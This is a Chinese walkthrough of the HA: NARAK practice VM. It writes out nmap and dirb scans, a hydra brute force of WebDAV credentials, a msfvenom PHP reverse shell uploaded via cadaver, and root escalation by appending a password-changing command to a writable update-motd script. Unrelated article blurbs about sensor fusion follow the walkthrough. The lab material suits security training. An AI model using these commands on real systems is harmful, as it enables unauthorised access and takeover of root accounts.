HA NARAK渗透测试

HA: NARAK靶场渗透测试


image-20230729135340478

0x01 环境

image-20230729135708286

  • 攻击机:kali2023.4
  • 环境:VMware
  • 网络:NAT

0x02 信息收集

  • 查看本机网络信息(攻击机)
┌──(kali㉿kali)-[~]
└─$ ifconfig            
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.48.130  netmask 255.255.255.0  broadcast 192.168.48.255
        inet6 fe80::f2d9:5916:50bf:76a9  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:95:c9:f6  txqueuelen 1000  (Ethernet)
        RX packets 18061  bytes 12035305 (11.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15137  bytes 1681658 (1.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • nmap对c段网络进行扫描
nmap 192.168.48.0/24

发现192.168.48.133主机,开放端口:22,80

image-20230729141217432

http服务是开放的,进去看看

image-20230729164732242

  • 目录爆破

    dirb http:192.168.48.133
    

image-20230729164910107

获得一个webdav目录,然后需要账号密码登录,于是使用cewl 来生成一个账号和密码的字典

  • cewl 爬取网站关键字生成字典
cewl 192.168.48.133 -w narak.txt

image-20230729165047637

0x03 密码爆破

  • 使用hydra对webdav的账号密码进行爆破,利用刚刚得到的字典
hydra -L narak.txt -P narak.txt 192.168.48.133 http-get /webdav

image-20230729165323302
获得一对密钥:yamdoot:Swarg

  • 使用cadver(继续linux终端的webdav交互客户端)进行登录
cadaver http://192.168.48.133/webdav

image-20230729165350258

  • 使用msfvenom生成基于php的反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=5555 -o shell.php

image-20230729165431788
然后用cadaver的put命令上传
image-20230729165559855

  • 使用msf中的监听,设置payload lhost lport之后开启监听

image-20230729165851629
然后在网页中打开http://192.168.48.133/webdav/shell.php以执行php

image-20230729165936551
可以看到连接成功

0x04 shell反弹连接获取user.txt

  • 链接成功后用下面的命令改善回显
python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20230729170137659

反弹的用户为www用户,在/home/inferno/user.txt中获取到flag1

image-20230729170429381
试图通过命令直接找root.txt没找到
image-20230729170530164

  • 使用find命令搜索:从根目录开始搜索任何用户都可以写的文件有哪些
find / -type f -perm -ug=x,o=w 2>/dev/null

找到一个可疑的/mnt/hell.sh
image-20230729171020824
cat hell.sh发现里面的内容是密文,经过了解,这是brainfuck加密方式,并且发现任何用户都可以对update-motd.d下的文件写操作

  • brainfuck解码
    image-20230729170930861

image-20230729171122715

解得一个明文:chitragupt,猜测是某个用户的密码,因为前面的update-motd.d下的文件是需要ssh用户登录之后才会以root权限执行,所以提示应该是一个用户的密码,并且要用ssh登录,后面经过尝试,是inferno的密码

0x05 update-motd.d可写漏洞,提权获取root.txt

登录inferno用户
image-20230729172840991

看一下有什么权限,没什么收货
image-20230729172918385

  • 对00-header下手
    image-20230729172959175
echo 'echo "root:123456" | sudo chpasswd' >>/etc/update-motd.d/00-header
#在00-header文件后面追加写入更改root密码的命令

查看是否追加成功,有2行是因为之前有测试过一次
image-20230729173402109

update-motd介绍:就是说任何用户ssh登录时,都会以root权限执行欢迎脚本

image-20230729162914405

  • 重新ssh登录,以执行藏在欢迎脚本中的更改密码脚本

image-20230729173653863

su root并用123456密码登录成功,提权成功

  • 获取flag2:root.txt
    image-20230729164517256
内容概要:本文介绍了一个基于多传感器融合的定位系统设计方案,采用GPS、里程计和电子罗盘作为定位传感器,利用扩展卡尔曼滤波(EKF)算法对多源传感器数据进行融合处理,最终输出目标的滤波后位置信息,并提供了完整的Matlab代码实现。该方法有效提升了定位精度与稳定性,尤其适用于存在单一传感器误差或信号丢失的复杂环境,如自动驾驶、移动采用GPS、里程计和电子罗盘作为定位传感器,EKF作为多传感器的融合算法,最终输出目标的滤波位置(Matlab代码实现)机器人导航等领域。文中详细阐述了各传感器的数据建模方式、状态转移与观测方程构建,以及EKF算法的具体实现步骤,具有较强的工程实践价值。; 适合人群:具备一定Matlab编程基础,熟悉传感器原理和滤波算法的高校研究生、科研人员及从事自动驾驶、机器人导航等相关领域的工程技术人员。; 使用场景及目标:①学习和掌握多传感器融合的基本理论与实现方法;②应用于移动机器人、无人车、无人机等系统的高精度定位与导航开发;③作为EKF算法在实际工程中应用的教学案例或项目参考; 阅读建议:建议读者结合Matlab代码逐行理解算法实现过程,重点关注状态预测与观测更新模块的设计逻辑,可尝试引入真实传感器数据或仿真噪声环境以验证算法鲁棒性,并进一步拓展至UKF、PF等更高级滤波算法的研究与对比。
内容概要:文章围绕智能汽车新一代传感器的发展趋势,重点阐述了BEV(鸟瞰图视角)端到端感知融合架构如何成为智能驾驶感知系统的新范式。传统后融合与前融合方案因信息丢失或算力需求过高难以满足高阶智驾需求,而基于Transformer的BEV融合方案通过统一坐标系下的多源传感器特征融合,在保证感知精度的同时兼顾算力可行性,显著提升复杂场景下的鲁棒性与系统可靠性。此外,文章指出BEV模型落地面临大算力依赖与高数据成本的挑战,提出“数据采集-模型训练-算法迭代-数据反哺”的高效数据闭环体系,通过自动化标注与长尾数据反馈实现算法持续进化,降低对人工标注的依赖,提升数据利用效率。典型企业案例进一步验证了该路径的技术可行性与经济价值。; 适合人群:从事汽车电子、智能驾驶感知算法研发的工程师,以及关注自动驾驶技术趋势的产品经理和技术管理者;具备一定自动驾驶基础知识,希望深入了解BEV架构与数据闭环机制的专业人士。; 使用场景及目标:①理解BEV+Transformer为何成为当前感知融合的主流技术路线;②掌握数据闭环在BEV模型迭代中的关键作用及其工程实现逻辑;③为智能驾驶系统架构设计、传感器选型与算法优化提供决策参考; 阅读建议:本文侧重技术趋势分析与系统级思考,建议结合实际项目背景阅读,重点关注BEV融合逻辑与数据闭环构建方法,并可延伸研究相关企业在舱泊一体等场景的应用实践。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值